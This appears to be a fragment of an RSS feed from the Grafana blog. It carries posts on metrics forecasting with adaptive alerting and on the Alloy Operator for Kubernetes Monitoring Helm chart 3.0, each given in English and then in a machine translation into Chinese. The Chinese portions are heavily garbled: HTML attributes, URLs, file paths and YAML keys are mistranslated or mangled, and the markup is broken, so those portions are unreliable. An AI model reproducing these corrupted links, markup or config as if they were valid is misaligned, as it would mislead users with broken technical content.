easily.&lt;/li&gt;&#xA;&lt;li&gt;Now you can click on Create forecast. Your forecast is now trained in the backend and available 24/7 to give you an adaptive alert.&lt;/li&gt;&#xA;&lt;/ol&gt;&#xA;&lt;h2 id=&#34;faqs-on-adaptive-alerting&#34;&gt;FAQs on adaptive alerting&lt;/h2&gt;&#xA;&lt;p&gt;Now, maybe you read this entire blog, but you&amp;rsquo;re still unsure what we actually mean by adaptive alerting. Let’s take a look at this concept and its advantages in detail. &lt;/p&gt;&#xA;&lt;h3 id=&#34;when-should-i-use-adaptive-alerting&#34;&gt;When should I use adaptive alerting?&lt;/h3&gt;&#xA;&lt;p&gt;Adaptive alerts are best suited to identify unexpected changes in human-derived usage patterns. These patterns will have daily ups and downs—people behave differently at work versus then at home or at rest. There are also weekly patterns—people behave differently on weekends as opposed to weekdays. &lt;/p&gt;&#xA;&lt;p&gt;These patterns are evident in data such as the rate of sales transactions, or amount of traffic to a website (and system load that induces), but also in telemetry data of machinery in a factory or phone calls to a support hotline. &lt;/p&gt;&#xA;&lt;p&gt;Adaptive alerts can identify partial failures in a way static alerts are unable to. For example, adaptive alerts can identify a sudden 20% drop in sales transactions due to a struggling payment vendor, a peculiar increase in traffic to a seldom-used API, or an unusual temperature rise in a machine during normal operation. These issues may not be immediately catastrophic, but the adaptive alert firing allows you to learn of the issue sooner and maybe even avoid a potential major problem.&lt;/p&gt;&#xA;&lt;h3 id=&#34;what-are-the-advantages-of-adaptive-alerting&#34;&gt;What are the advantages of adaptive alerting?&lt;/h3&gt;&#xA;&lt;p&gt;Adaptive alerts are great at tracking unexpected changes in human-derived usage patterns, as mentioned above, but they also continuously learn and adapt to changes in that behavior.&lt;/p&gt;&#xA;&lt;p&gt;Consider the example of a web service with a growing user base and how to detect a possible denial-of-service attack. A static threshold alert can accomplish this in the short term, but as the user base grows, so does the traffic. Having to continually increase the static threshold is bothersome and error-prone. An adaptive alert will recognize the growing traffic pattern and only alert on a dramatic rise in requests.&lt;/p&gt;&#xA;&lt;p&gt;Adaptive alerts can also give special treatment to calendar days using the holidays feature, so expected drops or increases in your data on national holidays or other specified periods are accounted for and do not alert you unnecessarily.&lt;/p&gt;&#xA;&lt;h3 id=&#34;what-does-adaptive-alerting-cost&#34;&gt;What does adaptive alerting cost?&lt;/h3&gt;&#xA;&lt;p&gt;Metrics forecasting is now available in Grafana Cloud free of charge! If you are an Advanced or Enterprise customer, you can just start using it at no upcharge.&lt;/p&gt;&#xA;&lt;p&gt;There are&#xA;&lt;a href=&#34;/docs/grafana-cloud/alerting-and-irm/machine-learning/billing/?pg=blog&amp;amp;plcmt=body-txt&#34;&gt;some usage limits&lt;/a&gt;, but talk to us about requesting limit increases.&lt;/p&gt;&#xA;&lt;p&gt;&lt;em&gt;&#xA;&lt;a href=&#34;/products/cloud/?pg=blog&amp;amp;plcmt=body-txt&#34;&gt;Grafana Cloud&lt;/a&gt; is the easiest way to get started with metrics, logs, traces, dashboards, and more. We have a generous forever-free tier and plans for every use case.&#xA;&lt;a href=&#34;/auth/sign-up/create-user/?pg=blog&amp;amp;plcmt=body-txt&#34;&gt; Sign up for free now&lt;/a&gt;!&lt;/em&gt;&lt;/p&gt;】&lt;p&gt;在Grafana Cloud中，我们提供了一系列的AI功能来满足您的可观察性需求，包括用于预测您的任何指标的功能，并与之耦合&#xA;&lt;a href =“/docs/grafana/最终/walling/？pg = blog＆plcmt = body-txt”&gt; grafana警报&lt;/a&gt;。如果您想从&lt;em&gt;反应性&lt;/em&gt;转换为&lt;em&gt;主动&lt;/em&gt;警报，这是关键功能，因为在问题出现之前进行故障排除是现代可观察性的重要组成部分。&lt;/p&gt;&#xA;&lt;p&gt;为我们&#xA;&lt;a href =“/docs/docs/grafana-cloud/nertering and机器学习/动态宣传/预测/？页面，设置和优化了；我们简化了整个过程。&lt;/p&gt;&#xA;&lt;p&gt;使用新的UI，测试您的数据是否比以往更容易。您会在浏览器中看到预测的实时预览，让您立即评估该模型适合您的时间序列的程度。如果您认为可以改善模型拟合，现在可以实时调整模型参数，并立即查看影响。不再猜测 - 立即视觉反馈。&lt;/p&gt;&#xA;&lt;h2 id =“预测和自适应宣传”&gt;预测和自适应警报&lt;/h2&gt;&#xA;&lt;p&gt;预测支持一种可观察性方法，称为&lt;em&gt;自适应警报&lt;/em&gt;：在出现问题之前，触发警报以捕获问题，以免表现出来。 &lt;/p&gt;&#xA;&lt;p&gt;例如，假设您经营着一家当地的电子商务公司，该公司可以跟踪其交易，并且希望对未来需求有更好的了解。当然，您的交易自然会有所不同。您在周末的订单可能比在工作日要多。也许您晚上的交易要比在工作时间内更多。通过对交易指标设置预测，您将适合此交易行为。 &lt;/p&gt;&#xA;&lt;p&gt;当您将其与警报结合使用时，您会知道何时何时限制范围，而不是调整静态警报，从而帮助确保您在遇到由于突然涌现而无法处理的情况之前确保您在交易中处于顶峰。与我们的结合使用时，这特别强大&#xA;&lt;a href =“/docs/grafana-cloud/nervering-mind/nirm/machine-enerning/dynamic-alerting/forecasting/holidays/？pg = blog＆plcmt = body-txt = body-txt&#39;&gt;每天和每周季节性模式&lt;/a&gt; &lt;/a&gt; &lt;/a&gt;包括节假日。&#xA;&lt;图&#xA;class =“ figup-wrapper figuper-wrapper__lightbox W-100P”&#xA;样式=“最大宽度：1999px;”&#xA;itemprop =“ iSsectedmedia”&#xA;itemScope =“”&#xA;itemType =“ http://schema.org/imageObject”&#xA;&gt; &lt;a&#xA;class =“ Lightbox-link”&#xA;href =“/媒体/blog/metrics-forecasting/preview and-tune.png”&#xA;itemprop =“ contenturl”&#xA;&gt; &lt;div class =“ img-wrapper W-100P H-auto”&gt; &lt;img&#xA;class =“ Lazyload”&#xA;data-src =“/媒体/blog/metrics-forecasting/preview-and-tune.png” data-srcset =“/媒体/博客/metrics-forecasting/preview-and-tune.png?w=320 320w, /media/blog/metrics-forecasting/preview-and-tune.png?w=550 550w, /media/blog/metrics-forecasting/preview-and-tune.png?w=750 750w, /Media/blog/metrics-forecasting/preview-and-tune.png?w=900 900W，/media/Blog/Metrics-forecasting/preview和preview--preview-and-tune.png?w=1040 104010401 /Media/blog/metrics-forecasting/preview-and-tune.png？w = 1920年1920年&#xA;data-sizes =“ auto” alt =“ Grafana UI中的新指标预测菜单” width =“ 1999”高度=“ 1084”/&gt;&#xA;&lt;NoScript&gt;&#xA;&lt;img&#xA;src =“/媒体/blog/metrics-forecasting/preview-and-tune.png”&#xA;alt =“ Grafana UI中的新指标预测菜单” width =“ 1999”高度=“ 1084”/&gt;&#xA;&lt;/noscript&gt; &lt;/div&gt; &lt;/a&gt; &lt;/figie&gt;&#xA;&lt;h2 id =“如何改进的 - 米特里奇 - 折叠式 - 在格拉法纳 - 云中”&gt;我们如何改进Grafana Cloud中预测的指标&lt;/h2&gt;&#xA;&lt;p&gt;为了支持这一新行为，我们通过分开我们如何在Grafana Cloud中进行预测，从而做出了一些重大的技术改进。 （如果您还没有一个，您可以&#xA;&lt;a href =“/auth/ign-up/create-user/？pg = blog＆plcmt = body-txt”&gt;注册永远免费的帐户&lt;/a&gt;今天！）&lt;/p&gt;&#xA;&lt;p&gt;以前，我们将数据和参数发送到后端，运行一个模型，然后将其发送回前端，以便用户可以对其进行审核。通过将预测的创作和调整一步置于前端，现在可以比以往任何时候都更快地完成此步骤。这是由&#xA;&lt;a href =“ https://github.com/grafana/augurs” target =“ _ blank” rel =“ noopener noreferrer”&gt; augurs library &lt;/a&gt;。奥古斯在定制阶段的前端进行了繁重的举重。完成此操作后，预测将发送到后端以24/7可用。&lt;/p&gt;&#xA;&lt;h2 id =“操作式 - 自适应 - 掌握折叠式销售”&gt;如何使用预测&lt;/h2&gt;设置自适应警报&lt;/h2&gt;&#xA;&lt;p&gt;了解如何在此视频中设置预测：&lt;/p&gt;&#xA;&lt;div&#xA;x-data =“ {vimeo_is_up：false，响应：false}”&#xA;x-init =“ fetch（`https：//vimeo.com/api/oembed.json？url = https：//vimeo.com/1091319872`）&#xA;然后（响应=&gt; {&#xA;响应= true;&#xA;响应&amp;&amp; response.status === 200？ vimeo_is_up = true：vimeo_is_up = false;&#xA;}））&#xA;.catch（错误=&gt; {&#xA;响应= true;&#xA;}）””&#xA;X-Cloak&gt;&#xA;&lt;figie class =“ P-0 M-0”&gt;&#xA;&lt;template x-if =“ vimeo_is_up”&gt;&#xA;&lt;div class =“ my-1” style =“位置：相对; padding-bottom：56.25％;高度：0;溢出：隐藏;&#xA;&lt;iframe src =“ https://player.vimeo.com/video/1091319872？transparent = 0“ style =”位置：绝对; absolute; absolute; top; top：0; left：0; width; width：100％;高度：100％; 100％; border; border：border：0; border：0;&#39;; title =“ vimeo视频” webkitallowlscreen mozallowlscreen允许screen&gt; &lt;/iframe&gt;&#xA;&lt;/div&gt;&#xA;&lt;/template&gt;&#xA;&lt;template x-if =“响应&amp;&amp;！vimeo_is_up”&gt;&#xA;&lt;p class =“ bg-gray-17 p-1”&gt;这里应该有一个视频，但由于某种原因没有。我们要么输入ID错误（糟糕！），要么Vimeo降低了。如果是后者，我们希望他们很快就会备份。同时，&#xA;&lt;a href =“/blog/”&gt;查看我们的博客&lt;/a&gt;！&lt;/p&gt;&#xA;&lt;/template&gt;&lt;/figure&gt;&#xA;&lt;/div&gt;&#xA;&lt;p&gt;您也可以遵循此分步教程：&lt;/p&gt;&#xA;&lt;ol&gt;&#xA;&lt;li&gt;在Grafana Cloud中，导航至&lt;strong&gt;指标预测&lt;/strong&gt;。&lt;/li&gt;&#xA;&lt;li&gt;选择一个指标来创建一个预测。我们支持以下预测的数据源：Prometheus，Graphite，Grafana Loki（仅公制查询），Postgres，InfluxdB，Snowflake，Snowflake，Splunk，Elasticsearch，BigQuery，Mongquery，Mongodb和Datadog。&lt;/li&gt;&#xA;&lt;li&gt;使用我们的瞬时预览来调整您的模型。如果您认为显示的预测还不够好，也请使用我们的高级模型选项。&lt;/li&gt;&#xA;&lt;li&gt;完成调整后，给您的预测一个名称，然后选中其下面的框以基于它创建警报。对于名称，我们建议您遵循内部命名约定，以确保您更容易找到预测。&lt;/li&gt;&#xA;&lt;li&gt;现在您可以单击创建预测。现在，您的预测在后端接受了培训，并提供24/7的可用性，以提供自适应警报。&lt;/li&gt;&#xA;&lt;/ol&gt;&#xA;&lt;h2 id =“自适应警报上的常见问题解答”&gt; FAQS &lt;/h2&gt;&#xA;&lt;p&gt;现在，也许您阅读了整个博客，但是您仍然不确定通过自适应警报的实际含义。让我们详细了解这个概念及其优势。 &lt;/p&gt;&#xA;&lt;h3 id =“当should-i使用自适应 - 掌握”&gt;我什么时候应该使用自适应警报？&lt;/h3&gt;&#xA;&lt;p&gt;自适应警报最适合确定人类衍生的用法模式的意外变化。这些模式每天都有起伏 - 人的工作方式与在家中或休息时的行为不同。每周都有每周的模式 - 周末的人行为不同，而不是工作日。 &lt;/p&gt;&#xA;&lt;p&gt;这些模式在数据中很明显，例如销售交易率，网站的流量（以及引起的系统负载），以及工厂中机械的遥测数据或电话打电话给支持热线。 &lt;/p&gt;&#xA;&lt;p&gt;自适应警报可以以静态警报无法做到的方式识别部分故障。例如，自适应警报可以确定由于挣扎的付款供应商的销售交易突然下降，销售交易，很少使用的API的流量增加，或者在正常运行期间机器的温度不寻常。这些问题可能不会立即发生灾难性，但是自适应警报发射使您可以尽快了解该问题，甚至可以避免潜在的主要问题。&lt;/p&gt;&#xA;&lt;h3 id =“自适应 - 宣传”&gt;自适应警报的优点是什么？&lt;/h3&gt;&#xA;如上所述，&lt;p&gt;自适应警报非常擅长跟踪人类衍生的用法模式的意外变化，但它们也不断地学习并适应该行为的变化。&lt;/p&gt;&#xA;&lt;p&gt;考虑具有不断增长的用户群的Web服务的示例，以及如何检测可能的拒绝服务攻击。静态阈值警报可以在短期内完成此操作，但是随着用户群的增长，流量也会增长。不得不不断增加静态阈值是麻烦和容易出错的。自适应警报将认识到不断增长的交通模式，并且仅对请求的急剧上升。&lt;/p&gt;&#xA;&lt;p&gt;自适应警报还可以使用假期功能为日历日提供特殊待遇，因此在国家假期或其他指定期间的数据中有望下降或增加数据，并且不会不必要地提醒您。&lt;/p&gt;。&lt;/p&gt;&#xA;&lt;h3 id =“什么做自适应-Alerting-Cost”&gt;自适应警报成本是多少？&lt;/h3&gt;&#xA;&lt;p&gt;指标预测现在可以在Grafana Cloud中免费提供！如果您是高级或企业客户，则可以开始使用它。&lt;/p&gt;&#xA;&lt;p&gt;有&#xA;&lt;a href =“/docs/grafana-cloud/nervering-mind/nir-nirs/machine-enerning/billing/？pg = blog＆plcmt = body-txt”&gt;某些用法限制&lt;/a&gt;，但请与我们讨论要求限制增加。&lt;/p&gt;&#xA;&lt;p&gt; &lt;em&gt;&#xA;&lt;a href =“/products/cloud/？pg = blog＆plcmt = body-txt”&gt; grafana cloud &lt;/a&gt;是从指标，日志，痕迹，痕迹，仪表板等开始的最简单方法。我们有一个宽敞的永远的层次，并为每个用例都有计划。&#xA;&lt;a href =“//auth/ign-up/create-user/？pg = blog＆plcmt = body-txt”&gt;现在免费注册&lt;/a&gt;！&lt;/em&gt; &lt;/em&gt; &lt;/p&gt;</description>
      <pubDate>Mon, 16 Jun 2025 00:00:00 +0000</pubDate>
    </item>
    <item>
      <title>【Configure and customize Kubernetes Monitoring easier with Alloy Operator】使用合金操作员更容易配置和自定义Kubernetes监视</title>
      <link>https://grafana.com/blog/2025/06/17/configure-and-customize-kubernetes-monitoring-easier-with-alloy-operator/</link>
      <description>【&lt;p&gt;What if you were to tell&#xA;&lt;a href=&#34;/solutions/kubernetes/&#34;&gt;Kubernetes Monitoring&lt;/a&gt; what you wanted, and the system configured collectors based on your choices? We wondered that as well—wondered enough to create&#xA;&lt;a href=&#34;https://github.com/grafana/alloy-operator&#34; target=&#34;_blank&#34; rel=&#34;noopener noreferrer&#34;&gt;Alloy Operator&lt;/a&gt; and its&#xA;&lt;a href=&#34;https://github.com/grafana/alloy-operator/tree/main/charts/alloy-operator&#34; target=&#34;_blank&#34; rel=&#34;noopener noreferrer&#34;&gt;Helm chart&lt;/a&gt; for version 3.0 of the&#xA;&lt;a href=&#34;https://github.com/grafana/k8s-monitoring-helm/tree/main/charts/k8s-monitoring&#34; target=&#34;_blank&#34; rel=&#34;noopener noreferrer&#34;&gt;Kubernetes Monitoring Helm chart&lt;/a&gt;. &lt;/p&gt;&#xA;&lt;p&gt;We&amp;rsquo;re excited to share that the new Kubernetes Monitoring Helm chart is now available, and it introduces a dynamic way of setting up your telemetry data collection with Alloy Operator. In this blog post we&amp;rsquo;ll take a look at why we made the change, and how it makes configuration and customizing for your needs better.&lt;/p&gt;&#xA;&lt;h2 id=&#34;why-change&#34;&gt;Why change?&lt;/h2&gt;&#xA;&lt;p&gt;Let’s talk about why we created Alloy Operator in the first place:&lt;/p&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;The main &lt;code&gt;values.yaml&lt;/code&gt; file of the Helm chart was humongous. In version 1.6, there were almost 3,000 lines of code. It was daunting to try to find the few lines of code you care about. Even in Version 2.0, 71% of the values file was&#xA;&lt;a href=&#34;/docs/alloy/latest/&#34;&gt;Grafana Alloy&lt;/a&gt; fields. &lt;/li&gt;&#xA;&lt;li&gt;Each Alloy instance required a Helm subchart. Helm limits how subcharts are handled, meaning any modification you want to pass to the subchart&amp;rsquo;s values must be defined in the parent&amp;rsquo;s &lt;code&gt;values.yaml&lt;/code&gt; file. And the &lt;code&gt;values.yaml&lt;/code&gt; file does not &amp;ldquo;template&amp;rdquo; itself. Not only does it become a lot of code, but it’s code that some users will never need or use, depending on their configuration.&lt;/li&gt;&#xA;&lt;li&gt;We had a new feature to introduce, which meant yet another Helm chart. On top of all that, new Alloy instances are looming in the future. &lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;h2 id=&#34;dynamic-feature-influence&#34;&gt;Dynamic &amp;lsquo;feature influence&amp;rsquo;&lt;/h2&gt;&#xA;&lt;p&gt;The Alloy Operator can also dynamically configure the traditional Alloy objects using the instructions from the Kubernetes Monitoring Helm chart. When you select a feature you want to include, Alloy Operator configures the appropriate Alloy collector and its requirements. Requirements can be specific permissions, ports, environmental variables, and so on.&lt;/p&gt;&#xA;&lt;p&gt;For example, if you enable the&#xA;&lt;a href=&#34;/products/cloud/application-observability/&#34;&gt;Grafana Cloud Application Observability&lt;/a&gt; feature, the &lt;code&gt;alloy-receiver&lt;/code&gt; instance will automatically have its ports opened to the matching receiver.&lt;/p&gt;&#xA;&lt;div class=&#34;code-snippet code-snippet__mini&#34;&gt;&lt;div class=&#34;lang-toolbar__mini&#34;&gt;&#xA;&lt;span class=&#34;code-clipboard&#34;&gt;&#xA;&lt;button x-data=&#34;app_code_snippet()&#34; x-init=&#34;init()&#34; @click=&#34;copy()&#34;&gt;&#xA;&lt;img class=&#34;code-clipboard__icon&#34; src=&#34;/media/images/icons/icon-copy-small-2.svg&#34; alt=&#34;Copy code to clipboard&#34; width=&#34;14&#34; height=&#34;13&#34;&gt;&#xA;&lt;span&gt;Copy&lt;/span&gt;&#xA;&lt;/button&gt;&#xA;&lt;/span&gt;&#xA;&lt;/div&gt;&lt;div class=&#34;code-snippet code-snippet__border&#34;&gt;&#xA;&lt;pre data-expanded=&#34;false&#34;&gt;&lt;code class=&#34;language-none&#34;&gt;# Set by you:&#xA;applicationObservability:&#xA;enabled: true&#xA;receivers:&#xA;zipkin:&#xA;enabled: true&#xA;port: 9411&#xA;# Automatically set by the Alloy Operator:&#xA;alloy-receiver:&#xA;alloy:&#xA;extraPorts:&#xA;- name: zipkin&#xA;port: 9411&#xA;targetPort: 9411&#xA;protocol: TCP&lt;/code&gt;&lt;/pre&gt;&#xA;&lt;/div&gt;&#xA;&lt;/div&gt;&lt;p&gt;We have plans for even more places where enabling and configuring features will automatically configure your Alloy instances.&lt;/p&gt;&#xA;&lt;h1 id=&#34;tail-sampling-now-available&#34;&gt;Tail sampling now available&lt;/h1&gt;&#xA;&lt;p&gt;We’re proud to announce that in version 3.0,&#xA;&lt;a href=&#34;https://github.com/grafana/k8s-monitoring-helm/blob/main/charts/k8s-monitoring/docs/destinations/otlp.md#tail-sampling&#34; target=&#34;_blank&#34; rel=&#34;noopener noreferrer&#34;&gt; tail sampling&lt;/a&gt; is now as easy as enabling it within your &lt;code&gt;otlp&lt;/code&gt;-type destinations. Prior to 3.0, this required configuring complex interactions between the Kubernetes Monitoring Helm chart and at least one or more additional Alloy instances. Tail sampling allows for traces to be “sampled” using various policies. Common options include filtering based on a percentage, status codes, or span attributes. Tail sampling is enabled under destinations:&lt;/p&gt;&#xA;&lt;div class=&#34;code-snippet code-snippet__mini&#34;&gt;&lt;div class=&#34;lang-toolbar__mini&#34;&gt;&#xA;&lt;span class=&#34;code-clipboard&#34;&gt;&#xA;&lt;button x-data=&#34;app_code_snippet()&#34; x-init=&#34;init()&#34; @click=&#34;copy()&#34;&gt;&#xA;&lt;img class=&#34;code-clipboard__icon&#34; src=&#34;/media/images/icons/icon-copy-small-2.svg&#34; alt=&#34;Copy code to clipboard&#34; width=&#34;14&#34; height=&#34;13&#34;&gt;&#xA;&lt;span&gt;Copy&lt;/span&gt;&#xA;&lt;/button&gt;&#xA;&lt;/span&gt;&#xA;&lt;/div&gt;&lt;div class=&#34;code-snippet code-snippet__border&#34;&gt;&#xA;&lt;pre data-expanded=&#34;false&#34;&gt;&lt;code class=&#34;language-none&#34;&gt;destinations:&#xA;- name: tempo&#xA;type: otlp&#xA;url: tempo.tempo.svc:4317&#xA;traces: {enabled: true}&#xA;processors:&#xA;tailSampling:&#xA;enabled: true&lt;/code&gt;&lt;/pre&gt;&#xA;&lt;/div&gt;&#xA;&lt;/div&gt;&lt;p&gt;This will automatically deploy the extra Alloy instances required to properly apply your tail sampling policies, before delivering to your original intended destination. This dynamic deployment of Alloy was not possible without the Alloy Operator.&lt;/p&gt;&#xA;&lt;h2 id=&#34;how-alloy-operator-works&#34;&gt;How Alloy Operator works&lt;/h2&gt;&#xA;&lt;p&gt;Alloy Operator is a Helm-based, small-footprint operator created using the&#xA;&lt;a href=&#34;https://sdk.operatorframework.io/docs/building-operators/helm/&#34; target=&#34;_blank&#34; rel=&#34;noopener noreferrer&#34;&gt;Operator SDK&lt;/a&gt;. Instead of requiring an Alloy instance and a Helm chart, Alloy Operator acts on &lt;code&gt;kind: Alloy&lt;/code&gt; objects. When an Alloy object is deployed to the cluster by the Kubernetes Monitoring Helm chart, the Alloy Operator:&lt;/p&gt;&#xA;&lt;ol&gt;&#xA;&lt;li&gt;Creates the components needed by the object (such as file system access, permissions, or the capability to read secrets)&lt;/li&gt;&#xA;&lt;li&gt;Performs a Helm install of the Alloy object and its components&lt;/li&gt;&#xA;&lt;/ol&gt;&#xA;&lt;p&gt;To view what’s been installed, you can use the &lt;code&gt;Helm list&lt;/code&gt; command. This diagram shows all available Alloy objects installed as of 3.0.&lt;/p&gt;&#xA;&lt;figure&#xA;class=&#34;figure-wrapper figure-wrapper__lightbox w-100p &#34;&#xA;style=&#34;max-width: 1506px;&#34;&#xA;itemprop=&#34;associatedMedia&#34;&#xA;itemscope=&#34;&#34;&#xA;itemtype=&#34;http://schema.org/ImageObject&#34;&#xA;&gt;&lt;a&#xA;class=&#34;lightbox-link&#34;&#xA;href=&#34;/media/blog/alloy-operator/workflow.png&#34;&#xA;itemprop=&#34;contentUrl&#34;&#xA;&gt;&lt;div class=&#34;img-wrapper w-100p h-auto&#34;&gt;&lt;img&#xA;class=&#34;lazyload &#34;&#xA;data-src=&#34;/media/blog/alloy-operator/workflow.png&#34;data-srcset=&#34;/media/blog/alloy-operator/workflow.png?w=320 320w, /media/blog/alloy-operator/workflow.png?w=550 550w, /media/blog/alloy-operator/workflow.png?w=750 750w, /media/blog/alloy-operator/workflow.png?w=900 900w, /media/blog/alloy-operator/workflow.png?w=1040 1040w, /media/blog/alloy-operator/workflow.png?w=1240 1240w, /media/blog/alloy-operator/workflow.png?w=1920 1920w&#34;&#xA;data-sizes=&#34;auto&#34;alt=&#34;&#34;width=&#34;1506&#34;height=&#34;1124&#34;/&gt;&#xA;&lt;noscript&gt;&#xA;&lt;img&#xA;src=&#34;/media/blog/alloy-operator/workflow.png&#34;&#xA;alt=&#34;&#34;width=&#34;1506&#34;height=&#34;1124&#34;/&gt;&#xA;&lt;/noscript&gt;&lt;/div&gt;&lt;/a&gt;&lt;/figure&gt;&#xA;&lt;h2 id=&#34;helm-chart-30-same-best-practices-as-before&#34;&gt;Helm chart 3.0: same best practices as before&lt;/h2&gt;&#xA;&lt;p&gt;Helm chart 3.0 follows the same best practices as previous versions, and ensures&#xA;&lt;a href=&#34;https://www.twingate.com/blog/glossary/Encapsulation&#34; target=&#34;_blank&#34; rel=&#34;noopener noreferrer&#34;&gt;encapsulation&lt;/a&gt; to maintain modularity and security. That means each object, whether Alloy, Node Exporter, or cAdvisor, is restricted to the permissions required for it to perform its function.&lt;/p&gt;&#xA;&lt;h3 id=&#34;upgrading-from-helm-chart-v1&#34;&gt;Upgrading from Helm chart v1&lt;/h3&gt;&#xA;&lt;p&gt;Even with all these changes, we’re doing what we can to make migration as simple as possible. Most of v1’s settings will map directly to a setting in v2. Plus, you can reference the&#xA;&lt;a href=&#34;https://github.com/grafana/k8s-monitoring-helm/blob/main/charts/k8s-monitoring/docs/Migration.md&#34; target=&#34;_blank&#34; rel=&#34;noopener noreferrer&#34;&gt;migration guide&lt;/a&gt; to help show how to do that. We are also building a&#xA;&lt;a href=&#34;https://grafana.github.io/k8s-monitoring-helm-migrator/&#34; target=&#34;_blank&#34; rel=&#34;noopener noreferrer&#34;&gt;migration utility&lt;/a&gt; that should be able to take your v1 &lt;code&gt;values.yaml&lt;/code&gt; file and return a valid v3 &lt;code&gt;values.yaml&lt;/code&gt; file.&lt;/p&gt;&#xA;&lt;h3 id=&#34;upgrading-from-helm-chart-v2x&#34;&gt;Upgrading from Helm chart v2.x&lt;/h3&gt;&#xA;&lt;p&gt;Alloy Operator requires the use of the new Alloy CRD, which will only be applied on new installations. With upgrades, you must first deploy the CRD. The Kubernetes Monitoring Helm chart will detect if the CRD is required and will print the location of the CRD for install. Alternatively, you can download the CRD manifest from the&#xA;&lt;a href=&#34;https://github.com/grafana/alloy-operator/releases&#34; target=&#34;_blank&#34; rel=&#34;noopener noreferrer&#34;&gt;Alloy Operator releases&lt;/a&gt;, and apply it with &lt;code&gt;kubectl&lt;/code&gt;.&lt;/p&gt;&#xA;&lt;h2 id=&#34;feedback&#34;&gt;Feedback&lt;/h2&gt;&#xA;&lt;p&gt;We love to hear from you! All of the changes to the&#xA;&lt;a href=&#34;https://github.com/grafana/k8s-monitoring-helm/tree/main/charts/k8s-monitoring&#34; target=&#34;_blank&#34; rel=&#34;noopener noreferrer&#34;&gt;Kubernetes Monitoring Helm chart&lt;/a&gt; and the creation of Alloy Operator were inspired by the feedback and comments we have heard from our amazing community. If you are using the Helm chart, tell us what you think. We drive development on feedback and contributions. Find us in the Grafana public Slack in the #kubernetes channel, or attend one of our&#xA;&lt;a href=&#34;https://github.com/grafana/k8s-monitoring-helm#office-hours&#34; target=&#34;_blank&#34; rel=&#34;noopener noreferrer&#34;&gt;k8s-monitoring Helm chart office hours&lt;/a&gt;.&lt;/p&gt;&#xA;&lt;p&gt;&lt;em&gt;&#xA;&lt;a href=&#34;/products/cloud/?pg=blog&amp;amp;plcmt=body-txt&#34;&gt;Grafana Cloud&lt;/a&gt; is the easiest way to get started with metrics, logs, traces, dashboards, and more. We have a generous forever-free tier and plans for every use case.&#xA;&lt;a href=&#34;/auth/sign-up/create-user/?pg=blog&amp;amp;plcmt=body-txt&#34;&gt; Sign up for free now&lt;/a&gt;!&lt;/em&gt;&lt;/p&gt;】&lt;p&gt;如果您要告诉&#xA;&lt;a href =“/solutions/kubernetes/”&gt; kubernetes监视&lt;/a&gt;您想要的是，系统根据您的选择配置了收集器？我们也想知道这一点 - 足以创造&#xA;&lt;a href =“ https://github.com/grafana/alloy-operator” target =“ _ blank” rel =“ noopener noreferrer”&gt; Alloy操作员&lt;/a&gt;&#xA;&lt;a href =“ https://github.com/grafana/alloy-operator/tree/main/main/charts/alloy-aperator” target =“ _ black” rel =“ noopener noreferrer”&gt; helm图表&lt;/a&gt;&#xA;&lt;a href =“ https://github.com/grafana/k8s-monitoring-helm/tree/main/main/charts/k8s-monitoring“ target =“ _ blank” rel =“ noopener noreferrer” &lt;/p&gt;&#xA;&lt;p&gt;我们很高兴分享新的Kubernetes监视头盔图现已可用，并且它引入了一种与合金操作员建立遥测数据收集的动态方法。在这篇博客文章中，我们将研究为什么我们进行更改，以及如何使您的需求更好地进行配置和自定义。&lt;/p&gt;&#xA;&lt;H2 ID =“ Why-change”&gt;为什么要更改？&lt;/h2&gt;&#xA;&lt;p&gt;让我们谈谈为什么我们首先创建合金操作员：&lt;/p&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;主&lt;code&gt; values.yaml &lt;/code&gt;舵图的文件很庞大。在1.6版中，有将近3,000行代码。试图找到您关心的几行代码真是令人生畏。即使在2.0版中，值文件的71％为&#xA;&lt;a href =“/docs/Alloy/最终/”&gt; grafana合金&lt;/a&gt;字段。 &lt;/li&gt;&#xA;&lt;li&gt;每个合金实例都需要一个辅助子图。 Helm限制了子图的处理方式，这意味着必须将要传递给子图值的任何修改都必须在父级的&lt;code&gt; value.yaml &lt;/code&gt;文件中定义。 &lt;code&gt; value.yaml &lt;/code&gt;文件本身不会“模板”。它不仅变成了很多代码，而且是某些用户永远不需要或使用的代码，具体取决于其配置。&lt;/li&gt;&#xA;&lt;li&gt;我们有一个新功能要介绍，这意味着另一个舵图。最重要的是，将来新的合金实例迫在眉睫。 &lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;在&#xA;&lt;p&gt;合金运算符还可以使用Kubernetes监视Helm图表的说明动态配置传统合金对象。当您选择要包含的功能时，合金操作员将配置适当的合金收集器及其要求。要求可以是特定的权限，端口，环境变量等。&lt;/p&gt;&#xA;&lt;p&gt;例如，如果启用&#xA;&lt;a href =“/products/cloud/cloud/application-observability/“&gt; grafana cloud应用程序可观察性&lt;/a&gt;功能，&lt;code&gt; Alloy-Receiver &lt;/code&gt;实例将自动将其端口打开到匹配的接收器。&lt;/p&gt;&#xA;&lt;div class =“ code-snippet code-snippet__mini”&gt; &lt;div class =“ lang-toolbar__mini”&gt;&#xA;&lt;span class =“ code-clipboard”&gt;&#xA;&lt;button x-data =“ app_code_snippet（）” x-init =“ init（）” @click =“ copy（）”&gt;&#xA;&lt;img class =“ code-clipboard__icon” src =“/媒体/images/icons/icon-copy-small-2.svg” alt=“将代码复制到剪贴板” width =“ 14”高=“ 13”&gt;&#xA;&lt;span&gt;复制&lt;/span&gt;&#xA;&lt;/button&gt;&#xA;&lt;/span&gt;&#xA;&lt;/div&gt; &lt;div class =“代码 - 尼珀代码snippet__border”&gt;&#xA;&lt;pre data-expanded =“ false”&gt; &lt;code class =“ language-none”&gt;＃由您设置：&#xA;应用程序保存：&#xA;启用：true&#xA;接收者：&#xA;Zipkin：&#xA;启用：true&#xA;端口：9411&#xA;＃由合金操作员自动设置：&#xA;合金接收器：&#xA;合金：&#xA;外推：&#xA; - 名称：Zipkin&#xA;端口：9411&#xA;TargetPort：9411&#xA;协议：TCP &lt;/code&gt; &lt;/pre&gt;&#xA;&lt;/div&gt;&#xA;&lt;/div&gt; &lt;p&gt;我们有计划在更多的地方启用和配置功能将自动配置您的合金实例。&lt;/p&gt;&#xA;在&#xA;&lt;p&gt;我们很自豪地在版本3.0中宣布这一点，&#xA;&lt;a href =“ https://github.com/grafana/k8s-monitoring-helm/blob/main/main/charts/k8s-monitoring/docs/destinations/destinations/otlp.md.md#tail-samampling--- &lt;code&gt; OTLP 